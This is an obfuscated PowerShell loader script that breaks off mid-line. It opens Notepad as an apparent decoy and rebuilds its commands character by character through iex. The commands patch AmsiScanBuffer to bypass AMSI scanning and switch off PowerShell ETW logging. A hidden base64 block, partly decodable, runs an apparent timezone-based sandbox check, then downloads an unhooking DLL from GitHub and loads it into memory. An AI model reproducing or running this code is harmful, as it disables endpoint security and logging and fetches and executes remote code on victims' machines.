start-process notepad.exe
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
$0='A';$1='d';$2='d';$3='-';$4='T';$5='y';$6='p';$7='e';$8=' ';$9='$';$10='W';$11='i';$12='n';$13='3';$14='2';$15=';';$16='$';$17='L';$18='o';$19='a';$20='d';$21='L';$22='i';$23='b';$24='r';$25='a';$26='r';$27='y';$28=' ';$29='=';$30=' ';$31='[';$32='W';$33='i';$34='n';$35='3';$36='2';$37=']';$38=':';$39=':';$40='L';$41='o';$42='a';$43='d';$44='L';$45='i';$46='b';$47='r';$48='a';$49='r';$50='y';$51='(';$52='"';$53='a';$54='m';$55='"';$56=' ';$57='+';$58=' ';$59='"';$60='s';$61='i';$62='.';$63='d';$64='l';$65='l';$66='"';$67=')';$68='
';$d= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$d);$0='$';$1='A';$2='d';$3='d';$4='r';$5='e';$6='s';$7='s';$8=' ';$9='=';$10=' ';$11='[';$12='W';$13='i';$14='n';$15='3';$16='2';$17=']';$18=':';$19=':';$20='G';$21='e';$22='t';$23='P';$24='r';$25='o';$26='c';$27='A';$28='d';$29='d';$30='r';$31='e';$32='s';$33='s';$34='(';$35='$';$36='L';$37='o';$38='a';$39='d';$40='L';$41='i';$42='b';$43='r';$44='a';$45='r';$46='y';$47=',';$48=' ';$49='"';$50='A';$51='m';$52='s';$53='i';$54='"';$55=' ';$56='+';$57=' ';$58='"';$59='S';$60='c';$61='a';$62='n';$63='"';$64=' ';$65='+';$66=' ';$67='"';$68='B';$69='u';$70='f';$71='f';$72='e';$73='r';$74='"';$75=')';$76='
';$H= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$74+$75+$76+$H);$0='$';$1='p';$2=' ';$3='=';$4=' ';$5='0';$6='
';$c= ' ';iex($0+$1+$2+$3+$4+$5+$6+$c);$0='[';$1='W';$2='i';$3='n';$4='3';$5='2';$6=']';$7=':';$8=':';$9='V';$10='i';$11='r';$12='t';$13='u';$14='a';$15='l';$16='P';$17='r';$18='o';$19='t';$20='e';$21='c';$22='t';$23='(';$24='$';$25='A';$26='d';$27='d';$28='r';$29='e';$30='s';$31='s';$32=',';$33=' ';$34='[';$35='u';$36='i';$37='n';$38='t';$39='3';$40='2';$41=']';$42='5';$43=',';$44=' ';$45='0';$46='x';$47='4';$48='0';$49=',';$50=' ';$51='[';$52='r';$53='e';$54='f';$55=']';$56='$';$57='p';$58=')';$59='
';$M= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$M);$0='$';$1='P';$2='a';$3='t';$4='c';$5='h';$6=' ';$7='=';$8=' ';$9='[';$10='B';$11='y';$12='t';$13='e';$14='[';$15=']';$16=']';$17=' ';$18='(';$19='0';$20='x';$21='B';$22='8';$23=',';$24=' ';$25='0';$26='x';$27='5';$28='7';$29=',';$30=' ';$31='0';$32='x';$33='0';$34='0';$35=',';$36=' ';$37='0';$38='x';$39='0';$40='7';$41=',';$42=' ';$43='0';$44='x';$45='8';$46='0';$47=',';$48=' ';$49='0';$50='x';$51='C';$52='3';$53=')';$54='
';$y= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$y);$0='[';$1='S';$2='y';$3='s';$4='t';$5='e';$6='m';$7='.';$8='R';$9='u';$10='n';$11='t';$12='i';$13='m';$14='e';$15='.';$16='I';$17='n';$18='t';$19='e';$20='r';$21='o';$22='p';$23='S';$24='e';$25='r';$26='v';$27='i';$28='c';$29='e';$30='s';$31='.';$32='M';$33='a';$34='r';$35='s';$36='h';$37='a';$38='l';$39=']';$40=':';$41=':';$42='C';$43='o';$44='p';$45='y';$46='(';$47='$';$48='P';$49='a';$50='t';$51='c';$52='h';$53=',';$54=' ';$55='0';$56=',';$57=' ';$58='$';$59='A';$60='d';$61='d';$62='r';$63='e';$64='s';$65='s';$66=',';$67=' ';$68='6';$69=')';$70='
';$r= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$r);$0='
';$G= ' ';iex($0+$G);$0='[';$1='R';$2='e';$3='f';$4='l';$5='e';$6='c';$7='t';$8='i';$9='o';$10='n';$11='.';$12='A';$13='s';$14='s';$15='e';$16='m';$17='b';$18='l';$19='y';$20=']';$21=':';$22=':';$23='L';$24='o';$25='a';$26='d';$27='W';$28='i';$29='t';$30='h';$31='P';$32='a';$33='r';$34='t';$35='i';$36='a';$37='l';$38='N';$39='a';$40='m';$41='e';$42='(';$43="'";$44='S';$45='y';$46='s';$47='t';$48='e';$49='m';$50='.';$51='C';$52='o';$53='r';$54='e';$55="'";$56=')';$57='.';$58='G';$59='e';$60='t';$61='T';$62='y';$63='p';$64='e';$65='(';$66="'";$67='S';$68='y';$69='s';$70='t';$71='e';$72='m';$73='.';$74='D';$75='i';$76='a';$77='g';$78='n';$79='o';$80='s';$81='t';$82='i';$83='c';$84='s';$85='.';$86='E';$87='v';$88='e';$89='n';$90='t';$91='i';$92='n';$93='g';$94='.';$95='E';$96='v';$97='e';$98='n';$99='t';$100='P';$101='r';$102='o';$103='v';$104='i';$105='d';$106='e';$107='r';$108="'";$109=')';$110='.';$111='G';$112='e';$113='t';$114='F';$115='i';$116='e';$117='l';$118='d';$119='(';$120="'";$121='m';$122='_';$123='e';$124='n';$125='a';$126='b';$127='l';$128='e';$129='d';$130="'";$131=',';$132="'";$133='N';$134='o';$135='n';$136='P';$137='u';$138='b';$139='l';$140='i';$141='c';$142=',';$143='I';$144='n';$145='s';$146='t';$147='a';$148='n';$149='c';$150='e';$151="'";$152=')';$153='.';$154='S';$155='e';$156='t';$157='V';$158='a';$159='l';$160='u';$161='e';$162='(';$163='[';$164='R';$165='e';$166='f';$167=']';$168='.';$169='A';$170='s';$171='s';$172='e';$173='m';$174='b';$175='l';$176='y';$177='.';$178='G';$179='e';$180='t';$181='T';$182='y';$183='p';$184='e';$185='(';$186="'";$187='S';$188='y';$189='s';$190='t';$191='e';$192='m';$193='.';$194='M';$195='a';$196='n';$197='a';$198='g';$199='e';$200='m';$201='e';$202='n';$203='t';$204='.';$205='A';$206='u';$207='t';$208='o';$209='m';$210='a';$211='t';$212='i';$213='o';$214='n';$215='.';$216='T';$217='r';$218='a';$219='c';$220='i';$221='n';$222='g';$223='.';$224='P';$225='S';$226='E';$227='t';$228='w';$229='L';$230='o';$231='g';$232='P';$233='r';$234='o';$235='v';$236='i';$237='d';$238='e';$239='r';$240="'";$241=')';$242='.';$243='G';$244='e';$245='t';$246='F';$247='i';$248='e';$249='l';$250='d';$251='(';$252="'";$253='e';$254='t';$255='w';$256='P';$257='r';$258='o';$259='v';$260='i';$261='d';$262='e';$263='r';$264="'";$265=',';$266="'";$267='N';$268='o';$269='n';$270='P';$271='u';$272='b';$273='l';$274='i';$275='c';$276=',';$277='S';$278='t';$279='a';$280='t';$281='i';$282='c';$283="'";$284=')';$285='.';$286='G';$287='e';$288='t';$289='V';$290='a';$291='l';$292='u';$293='e';$294='(';$295='$';$296='n';$297='u';$298='l';$299='l';$300=')';$301=',';$302='0';$303=')';$304='
';$K= ' ';iex($0+$1+$2+$3+$4+$5+$6+$7+$8+$9+$10+$11+$12+$13+$14+$15+$16+$17+$18+$19+$20+$21+$22+$23+$24+$25+$26+$27+$28+$29+$30+$31+$32+$33+$34+$35+$36+$37+$38+$39+$40+$41+$42+$43+$44+$45+$46+$47+$48+$49+$50+$51+$52+$53+$54+$55+$56+$57+$58+$59+$60+$61+$62+$63+$64+$65+$66+$67+$68+$69+$70+$71+$72+$73+$74+$75+$76+$77+$78+$79+$80+$81+$82+$83+$84+$85+$86+$87+$88+$89+$90+$91+$92+$93+$94+$95+$96+$97+$98+$99+$100+$101+$102+$103+$104+$105+$106+$107+$108+$109+$110+$111+$112+$113+$114+$115+$116+$117+$118+$119+$120+$121+$122+$123+$124+$125+$126+$127+$128+$129+$130+$131+$132+$133+$134+$135+$136+$137+$138+$139+$140+$141+$142+$143+$144+$145+$146+$147+$148+$149+$150+$151+$152+$153+$154+$155+$156+$157+$158+$159+$160+$161+$162+$163+$164+$165+$166+$167+$168+$169+$170+$171+$172+$173+$174+$175+$176+$177+$178+$179+$180+$181+$182+$183+$184+$185+$186+$187+$188+$189+$190+$191+$192+$193+$194+$195+$196+$197+$198+$199+$200+$201+$202+$203+$204+$205+$206+$207+$208+$209+$210+$211+$212+$213+$214+$215+$216+$217+$218+$219+$220+$221+$222+$223+$224+$225+$226+$227+$228+$229+$230+$231+$232+$233+$234+$235+$236+$237+$238+$239+$240+$241+$242+$243+$244+$245+$246+$247+$248+$249+$250+$251+$252+$253+$254+$255+$256+$257+$258+$259+$260+$261+$262+$263+$264+$265+$266+$267+$268+$269+$270+$271+$272+$273+$274+$275+$276+$277+$278+$279+$280+$281+$282+$283+$284+$285+$286+$287+$288+$289+$290+$291+$292+$293+$294+$295+$296+$297+$298+$299+$300+$301+$302+$303+$304+$K);$0='
';$H= ' ';iex($0+$H);
$0='$';$1='v';$2='v';$3='E';$4='E';$5='=';$6=' ';$7='"';$8='P';$9='C';$10='M';$11='g';$12='b';$13='2';$14='p';$15='p';$16='c';$17='2';$18='d';$19='v';$20='a';$21='m';$22='l';$23='z';$24='Z';$25='2';$26='9';$27='q';$28='a';$29='W';$30='d';$31='q';$32='a';$33='W';$34='9';$35='k';$36='Z';$37='m';$38='l';$39='q';$40='b';$41='2';$42='d';$43='k';$44='Z';$45='m';$46='Q';$47='g';$48='I';$49='z';$50='4';$51='k';$52='c';$53='3';$54='R';$55='h';$56='b';$57='m';$58='R';$59='h';$60='c';$61='m';$62='R';$63='U';$64='a';$65='W';$66='1';$67='l';$68='e';$69='m';$70='9';$71='u';$72='Z';$73='S';$74='A';$75='9';$76='I';$77='F';$78='t';$79='T';$80='e';$81='X';$82='N';$83='0';$84='Z';$85='W';$86='0';$87='u';$88='V';$89='G';$90='l';$91='t';$92='Z';$93='V';$94='p';$95='v';$96='b';$97='m';$98='V';$99='d';$100='O';$101='j';$102='p';$103='D';$104='d';$105='X';$106='J';$107='y';$108='Z';$109='W';$110='5';$111='0';$112='V';$113='G';$114='l';$115='t';$116='Z';$117='V';$118='p';$119='v';$120='b';$121='m';$122='U';$123='u';$124='U';$125='3';$126='R';$127='h';$128='b';$129='m';$130='R';$131='h';$132='c';$133='m';$134='R';$135='O';$136='Y';$137='W';$138='1';$139='l';$140='P';$141='C';$142='M';$143='g';$144='b';$145='2';$146='p';$147='p';$148='c';$149='2';$150='d';$151='v';$152='a';$153='m';$154='l';$155='z';$156='Z';$157='2';$158='9';$159='q';$160='a';$161='W';$162='d';$163='q';$164='a';$165='W';$166='9';$167='k';$168='Z';$169='m';$170='l';$171='q';$172='b';$173='2';$174='d';$175='k';$176='Z';$177='m';$178='Q';$179='g';$180='I';$181='z';$182='4';$183='K';$184='J';$185='G';$186='R';$187='h';$188='e';$189='W';$190='x';$191='p';$192='Z';$193='2';$194='h';$195='0';$196='V';$197='G';$198='l';$199='t';$200='Z';$201='X';$202='p';$203='v';$204='b';$205='m';$206='U';$207='g';$208='P';$209='S';$210='B';$211='b';$212='U';$213='3';$214='l';$215='z';$216='d';$217='G';$218='V';$219='t';$220='L';$221='l';$222='R';$223='p';$224='b';$225='W';$226='V';$227='a';$228='b';$229='2';$230='5';$231='l';$232='X';$233='T';$234='o';$235='6';$236='Q';$237='3';$238='V';$239='y';$240='c';$241='m';$242='V';$243='u';$244='d';$245='F';$246='R';$247='p';$248='b';$249='W';$250='V';$251='a';$252='b';$253='2';$254='5';$255='l';$256='L';$257='k';$258='R';$259='h';$260='e';$261='W';$262='x';$263='p';$264='Z';$265='2';$266='h';$267='0';$268='T';$269='m';$270='F';$271='t';$272='Z';$273='T';$274='w';$275='j';$276='I';$277='G';$278='9';$279='q';$280='a';$281='X';$282='N';$283='n';$284='b';$285='2';$286='p';$287='p';$288='c';$289='2';$290='d';$291='v';$292='a';$293='m';$294='l';$295='n';$296='a';$297='m';$298='l';$299='v';$300='Z';$301='G';$302='Z';$303='p';$304='a';$305='m';$306='9';$307='n';$308='Z';$309='G';$310='Z';$311='k';$312='I';$313='C';$314='M';$315='+';$316='C';$317='j';$318='w';$319='j';$320='I';$321='G';$322='9';$323='q';$324='a';$325='X';$326='N';$327='n';$328='b';$329='2';$330='p';$331='p';$332='c';$333='2';$334='d';$335='v';$336='a';$337='m';$338='l';$339='n';$340='a';$341='m';$342='l';$343='v';$344='Z';$345='G';$346='Z';$347='p';$348='a';$349='m';$350='9';$351='n';$352='Z';$353='G';$354='Z';$355='k';$356='I';$357='C';$358='M';$359='+';$360='C';$361='m';$362='l';$363='m';$364='I';$365='C';$366='g';$367='k';$368='c';$369='3';$370='R';$371='h';$372='b';$373='m';$374='R';$375='h';$376='c';$377='m';$378='R';$379='U';$380='a';$381='W';$382='1';$383='l';$384='e';$385='m';$386='9';$387='u';$388='Z';$389='S';$390='A';$391='t';$392='Z';$393='X';$394='E';$395='g';$396='I';$397='k';$398='N';$399='v';$400='b';$401='3';$402='J';$403='k';$404='a';$405='W';$406='5';$407='h';$408='d';$409='G';$410='V';$411='k';$412='I';$413='F';$414='V';$415='u';$416='a';$417='X';$418='Z';$419='l';$420='c';$421='n';$422='N';$423='h';$424='b';$425='C';$426='B';$427='U';$428='a';$429='W';$430='1';$431='l';$432='I';$433='i';$434='A';$435='t';$436='b';$437='3';$438='I';$439='g';$440='J';$441='G';$442='R';$443='h';$444='e';$445='W';$446='x';$447='p';$448='Z';$449='2';$450='h';$451='0';$452='V';$453='G';$454='l';$455='t';$456='Z';$457='X';$458='p';$459='v';$460='b';$461='m';$462='U';$463='g';$464='L';$465='W';$466='V';$467='x';$468='I';$469='C';$470='J';$471='D';$472='b';$473='2';$474='9';$475='y';$476='Z';$477='G';$478='l';$479='u';$480='Y';$481='X';$482='R';$483='l';$484='Z';$485='C';$486='B';$487='V';$488='b';$489='m';$490='l';$491='2';$492='Z';$493='X';$494='J';$495='z';$496='Y';$497='W';$498='w';$499='g';$500='V';$501='G';$502='l';$503='t';$504='Z';$505='S';$506='I';$507='p';$508='I';$509='H';$510='s';$511='K';$512='C';$513='V';$514='d';$515='y';$516='a';$517='X';$518='R';$519='l';$520='L';$521='U';$522='9';$523='1';$524='d';$525='H';$526='B';$527='1';$528='d';$529='C';$530='A';$531='i';$532='V';$533='G';$534='h';$535='l';$536='I';$537='H';$538='R';$539='p';$540='b';$541='W';$542='U';$543='g';$544='e';$545='m';$546='9';$547='u';$548='Z';$549='S';$550='B';$551='p';$552='c';$553='y';$554='B';$555='D';$556='b';$557='2';$558='9';$559='y';$560='Z';$561='G';$562='l';$563='u';$564='Y';$565='X';$566='R';$567='l';$568='Z';$569='C';$570='B';$571='V';$572='b';$573='m';$574='l';$575='2';$576='Z';$577='X';$578='J';$579='z';$580='Y';$581='W';$582='w';$583='g';$584='V';$585='G';$586='l';$587='t';$588='Z';$589='S';$590='A';$591='o';$592='V';$593='V';$594='R';$595='D';$596='K';$597='S';$598='w';$599='g';$600='Z';$601='G';$602='8';$603='g';$604='b';$605='m';$606='9';$607='0';$608='I';$609='H';$610='B';$611='y';$612='b';$613='2';$614='N';$615='l';$616='Z';$617='W';$618='Q';$619='u';$620='I';$621='g';$622='p';$623='9';$624='I';$625='G';$626='V';$627='s';$628='c';$629='2';$630='U';$631='g';$632='e';$633='w';$634='o';$635='J';$636='V';$637='3';$638='J';$639='p';$640='d';$641='G';$642='U';$643='t';$644='T';$645='3';$646='V';$647='0';$648='c';$649='H';$650='V';$651='0';$652='I';$653='C';$654='J';$655='U';$656='a';$657='G';$658='U';$659='g';$660='d';$661='G';$662='l';$663='t';$664='Z';$665='S';$666='B';$667='6';$668='b';$669='2';$670='5';$671='l';$672='I';$673='G';$674='l';$675='z';$676='I';$677='C';$678='R';$679='z';$680='d';$681='G';$682='F';$683='u';$684='Z';$685='G';$686='F';$687='y';$688='Z';$689='F';$690='R';$691='p';$692='b';$693='W';$694='V';$695='6';$696='b';$697='2';$698='5';$699='l';$700='L';$701='i';$702='B';$703='Q';$704='c';$705='m';$706='9';$707='j';$708='Z';$709='W';$710='V';$711='k';$712='I';$713='S';$714='I';$715='K';$716='f';$717='Q';$718='o';$719='8';$720='I';$721='y';$722='B';$723='v';$724='a';$725='m';$726='l';$727='z';$728='Z';$729='2';$730='9';$731='q';$732='a';$733='X';$734='N';$735='n';$736='b';$737='2';$738='p';$739='p';$740='Z';$741='2';$742='p';$743='p';$744='b';$745='2';$746='R';$747='m';$748='a';$749='W';$750='p';$751='v';$752='Z';$753='2';$754='R';$755='m';$756='Z';$757='C';$758='A';$759='j';$760='P';$761='g';$762='o';$763='k';$764='c';$765='l';$766='l';$767='l';$768='I';$769='D';$770='0';$771='g';$772='K';$773='G';$774='l';$775='3';$776='c';$777='i';$778='A';$779='t';$780='V';$781='X';$782='N';$783='l';$784='Q';$785='m';$786='F';$787='z';$788='a';$789='W';$790='N';$791='Q';$792='Y';$793='X';$794='J';$795='z';$796='a';$797='W';$798='5';$799='n';$800='I';$801='C';$802='J';$803='o';$804='d';$805='H';$806='R';$807='w';$808='c';$809='z';$810='o';$811='v';$812='L';$813='2';$814='d';$815='p';$816='d';$817='G';$818='h';$819='1';$820='Y';$821='i';$822='5';$823='j';$824='b';$825='2';$826='0';$827='v';$828='R';$829='2';$830='V';$831='0';$832='U';$833='m';$834='V';$835='r';$836='d';$837='E';$838='J';$839='v';$840='e';$841='T';$842='c';$843='y';$844='N';$845='C';$846='9';$847='T';$848='a';$849='G';$850='F';$851='y';$852='c';$853='F';$854='V';$855='u';$856='a';$857='G';$858='9';$859='v';$860='a';$861='2';$862='V';$863='y';$864='L';$865='3';$866='J';$867='h';$868='d';$869='y';$870='9';$871='t';$872='Y';$873='W';$874='l';$875='u';$876='L';$877='1';$878='N';$879='o';$880='Y';$881='X';$882='J';$883='w';$884='V';$885='W';$886='5';$887='o';$888='b';$889='2';$890='9';$891='r';$892='Z';$893='X';$894='I';$895='u';$896='Z';$897='G';$898='x';$899='s';$900='I';$901='i';$902='k';$903='u';$904='Q';$905='2';$906='9';$907='u';$908='d';$909='G';$910='V';$911='u';$912='d';$913='A';$914='o';$915='8';$916='I';$917='y';$918='B';$919='v';$920='a';$921='m';$922='l';$923='z';$924='Z';$925='2';$926='9';$927='q';$928='a';$929='X';$930='N';$931='n';$932='b';$933='2';$934='p';$935='p';$936='Z';$937='2';$938='p';$939='p';$940='b';$941='2';$942='R';$943='m';$944='a';$945='W';$946='p';$947='v';$948='Z';$949='2';$950='R';$951='m';$952='Z';$953='C';$954='A';$955='j';$956='P';$957='g';$958='p';$959='b';$960='U';$961='3';$962='l';$963='z';$964='d';$965='G';$966='V';$967='t';$968='L';$969='l';$970='J';$971='l';$972='Z';$973='m';$974='x';$975='l';$976='Y';$977='3';$978='R';$979='p';$980='b';$981='2';$982='4';$983='u';$984='Q';$985='X';$986='N';$987='z';$988='Z';$989='W';$990='1';$991='i';$992='b';$993='H';$994='l';$995='d';$996='O';$997='j';$998='p';$999='M';$1000='b';$1001='2';$1002='F';$1003='k';$1004='K';$1005='C';$1006='R';$1007='y';$1008='W';$1009='W';$1010='U';$1011='p';$1012='C';$1013='j';$1014='w';$1015='j';$1016='I';$1017='G';$1018='9';$1019='q';$1020='a';$1021='X';$1022='N';$1023='n';$1024='b';$1025='2';$1026='p';$1027='p';$1028='c';$1029='2';$1030='d';$1031='v';$1032='a';$1033='m';$1034='l';$1035='n';$1036='a';$1037='m';$1038='l';$1039='v';$1040='Z';$1041='G';$1042='Z';$1043='p';$1044='a';$1045='m';$1046='9';$1047='n';$1048='Z';$1049='G';$1050='Z';$1051='k';$1052='I';$1053='C';$1054='M';$1055='+';$1056='C';$1057='l';$1058='t';$1059='T';$1060='a';$1061='G';$1062='F';$1063='y';$1064='c';$1065='F';$1066='V';$1067='u';$1068='a';$1069='G';$1070='9';$1071='v';$1072='a';$1073='2';$1074='V';$1075='y';$1076='X';$1077='T';$1078='o';$1079='6';$1080='T';$1081='W';$1082='F';$1083='p';$1084='b';$1085='i';$1086='g';$1087='p';$1088='C';$1089='j';$1090='w';$1091='j';$1092='I';$1093='G';$1094='9';$1095='q';$1096='a';$1097='X';$1098='N';$1099='n';$1100='b';$1101='2';$1102='p';$1103='p';$1104='c';$1105='2';$1106='d';$1107='v';$1108='a';$1109='m';$1110='l';$1111='n';$1112='a';$1113='m';$1114='l';$1115='v';$1116='Z';$1117='G';$1118='Z';$1119='p';$1120='a';$1121='m';$1122='9';$1123='n';$1124='Z';$1125='G';$1126='Z';$1127='k';$1128='I';$1129='C';$1130='M';$1131='+';$1132='C';$1133='i';$1134='R';$1135='w';$1136='a';$1137='W';$1138='x';$1139='v';$1140='Z';$1141='C';$1142='A';$1143='9';$1144='I';$1145='C';$1146='h';$1147='p';$1148='d';$1149='3';$1150='I';$1151='g';$1152='L';$1153='V';$1154='V';$1155='z';$1156='Z';$1157='U';$1158='J';$1159='h';$1160='c';$1161='2';$1162='l';$1163='j';$1164='U';$1165='G';$1166='F';$1167='y';$1168='c';$1169='2';$1170='l';$1171='u';$1172='Z';$1173='y';$1174='A';$1175='i';$1176='a';$1177='H';$1178='R';$1179='0';$1180='c';$1181='H';$1182='M';$1183='6';$1184='L';$1185='y';$1186='9';$1187='n';$1188='a';$1189='X';$1190='R';$1191='o';$1192='d';$1193='W';$1194='I';$1195='u';$1196='Y';$1197='2';$1198='9';$1199='t';$1200='L';$1201='z';$1202='F';$1203='s';$1204='M';$1205='W';$1206='w';$1207='x';$1208='b';$1209='D';$1210='F';$1211='s';$1212='L';$1213='z';$1214='F';$1215='q';$1216='M';$1217='W';$1218='o';$1219='x';$1220='a';$1221='j';$1222='F';$1223='q';$1224='L';$1225='3';$1226='J';$1227='h';$1228='d';$1229='y';$1230='9';$1231='t';$1232='Y';$1233='W';$1234='l';$1235='u';$1236='L';$1237='2';$1238='Q';$1239='i';$1240='K';$1241='S';$1242='5';$1243='D';$1244='b';$1245='2';$1246='5';$1247='0';$1248='Z';$1249='W';$1250='5';$1251='0';$1252='C';$1253='j';$1254='w';$1255='j';$1256='I';$1257='G';$1258='9';$1259='q';$1260='a';$1261='X';$1262='N';$1263='n';$1264='b';$1265='2';$1266='p';$1267='p';$1268='c';$1269='2';$1270='d';$1271='v';$1272='a';$1273='m';$1274='l';$1275='n';$1276='a';$1277='m';$1278='l';$1279='v';$1280='Z';$1281='G';$1282='Z';$1283='p';$1284='a';$1285='m';$1286='9';$1287='n';$1288='Z';$1289='G';$1290='Z';$1291='k';$1292='I';$1293='C';$1294='M';$1295='+';$1296='C';$1297='i';$1298='R';$1299='i';$1300='e';$1301='X';$1302='R';$1303='l';$1304='c';$1305='y';$1306='A';$1307='9';$1308='I';$1309='F';$1310='t';$1311='T';$1312='e';$1313='X';$1314='N';$1315='0';$1316='Z';$1317='W';$1318='0';$1319='u';$1320='Q';$1321='2';$1322='9';$1323='u';$1324='d';$1325='m';$1326='V';$1327='y';$1328='d';$1329='F';$1330='0';$1331='6';$1332='O';$1333='k';$1334='Z';$1335='y';$1336='b';$1337='2';$1338='1';$1339='C';$1340='Y';$1341='X';$1342='N';$1343='l';$1344='N';$1345='j';$1346='R';$1347='T';$1348='d';$1349='H';$1350='J';$1351='p';$1352='b';$1353='m';$1354='c';$1355='o';$1356='J';$1357='H';$1358='B';$1359='p';$1360='b';$1361='G';$1362='9';$1363='k';$1364='K';$1365='Q';$1366='o';$1367='8';$1368='I';$1369='y';$1370='B';$1371='v';$1372='a';$1373='m';$1374='l';$1375='z';$1376='Z';$1377='2';$1378='9';$1379='q';$1380='a';$1381='X';$1382='N';$1383='n';$1384='b';$1385='2';$1386='p';$1387='p';$1388='Z';$1389='2';$1390='p';$1391='p';$1392='b';$1393='2';$1394='R';$1395='m';$1396='a';$1397='W';$1398='p';$1399='v';$1400='Z';$1401='2';$1402='R';$1403='m';$1404='Z';$1405='C';$1406='A';$1407='j';$1408='P';$1409='g';$1410='o';$1411='k';$1412='Y';$1413='X';$1414='N';$1415='z';$1416='Z';$1417='W';$1418='1';$1419='i';$1420='b';$1421='H';$1422='k';$1423='g';$1424='P';$1425='S';$1426='B';$1427='b';$1428='U';$1429='3';$1430='l';$1431='z';$1432='d';$1433='G';$1434='V';$1435='t';$1436='L';$1437='l';$1438='J';$1439='l';$1440='Z';$1441='m';$1442='x';$1443='l';$1444='Y';$1445='3';$1446='R';$1447='p';$1448='b';$1449='2';$1450='4';$1451='u';$1452='Q';$1453='X';$1454='N';$1455='z';$1456='Z';$1457='W';$1458='1';$1459='i';$1460='b';$1461='H';$1462='l';$1463='d';$1464='O';$1465='j';$1466='p';$1467='M';$1468='b';$1469='2';$1470='F';$1471='k';$1472='K';$1473='C';$1474='R';$1475='i';$1476='e';$1477='X';$1478='R';$1479='l';$1480='c';$1481='y';$1482='k';$1483='K';$1484='P';$1485='C';$1486='M';$1487='g';$1488='b';$1489='2';$1490='p';$1491='p';$1492='c';$1493='2';$1494='d';$1495='v';$1496='a';$1497='m';$1498='l';$1499='z';$1500='Z';$1501='2';$1502='9';$1503='q';$1504='a';$1505='W';$1506='d';$1507='q';$1508='a';$1509='W';$1510='9';$1511='k';$1512='Z';$1513='m';$1514='l';$1515='q';$1516='b';$1517='2';$1518='d';$1519='k';$1520='Z';$1521='m';$1522='Q';$1523='g';$1524='I';$1525='z';$1526='4';$1527='K';$1528='W';$1529='1';$1530='N';$1531='5';$1532='c';$1533='3';$1534='R';$1535='l';$1536='b';$1537='S';$1538='5';$1539='S';$1540='Z';$1541='W';$1542='Z';$1543='s';$1544='Z';$1545='W';$1546='N';$1547='0';$1548='a';$1549='W';$1550='9';$1551='u';$1552='L';$1553='k';$1554='F';$1555='z';$1556='c';$1557='2';$1558='V';$1559='t';$1560='Y';$1561='m';$1562='x';$1563='5';$1564='X';$1565='T';$1566='o';$1567='6';$1568='T';$1569='G';$1570='9';$1571='h';$1572='Z';$1573='C';$1574='g';$1575='k';$1576='Y';$1577='n';$1578='l';$1579='0';$1580='Z';$1581='X';$1582='M';$1583='p';$1584='C';$1585='j';$1586='w';$1587='j';$1588='I';$1589='G';$1590='9';$1591='q';$1592='a';$1593='X';$1594='N';$1595='n';$1596='b';$1597='2';$1598='p';$1599='p';$1600='c';$1601='2';$1602='d';$1603='v';$1604='a';$1605='m';$1606='l';$1607='n';$1608='a';$1609='m';$1610='l';$1611='v';$1612='Z';$1613='G';$1614='Z';$1615='p';$1616='a';$1617='m';$1618='9';$1619='n';$1620='Z';$1621='G';$1622='Z';$1623='k';$1624='I';$1625='C';$1626='M';$1627='+';$1628='C';$1629='l';$1630='t';$1631='M';$1632='b';$1633='2';$1634='F';$1635='k';$1636='Z';$1637='X';$1638='I';$1639='u';$1640='U';$1641='H';$1642='J';$1643='v';$1644='Z';$1645='3';$1646='J';$1647='h';$1648='b';$1649='V';$1650='0';$1651='6';$1652='O';$1653='k';$1654='1';$1655='h';$1656='a';$1657='W';$1658='4';$1659='o';$1660='K';$1661='Q';$1662='o';$1663='=';$1664='"';$1665=';';$1666=' 